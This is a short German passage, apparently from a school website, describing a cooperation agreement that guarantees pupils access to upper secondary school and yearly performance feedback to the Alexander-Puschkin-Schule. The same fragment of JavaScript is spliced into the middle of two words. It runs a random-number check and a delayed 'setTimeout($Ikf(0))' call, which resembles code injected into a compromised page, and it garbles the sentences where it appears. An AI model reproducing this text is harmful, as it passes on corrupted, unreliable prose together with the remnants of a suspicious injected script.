Es wird vereinbart, dass durch den Kooperationsvertrag der Zugang zur gymnasialen Oberstufe möglich und die Aufnahme in die SEK 2 bei vorhandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andener Berechtigung garantiert wird.

Die Schulleitungen und Fachbereiche einzelner Schulen arbeiten eng zusammen und tauschen sich regelmäßig aus.

Die aufnehmende Schule gibt der Alexandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander-Puschkin-Schule am Ende eines jeden Schuljahres ein Feedback über die schulischen Leistungen der aufgenommenen Schüler.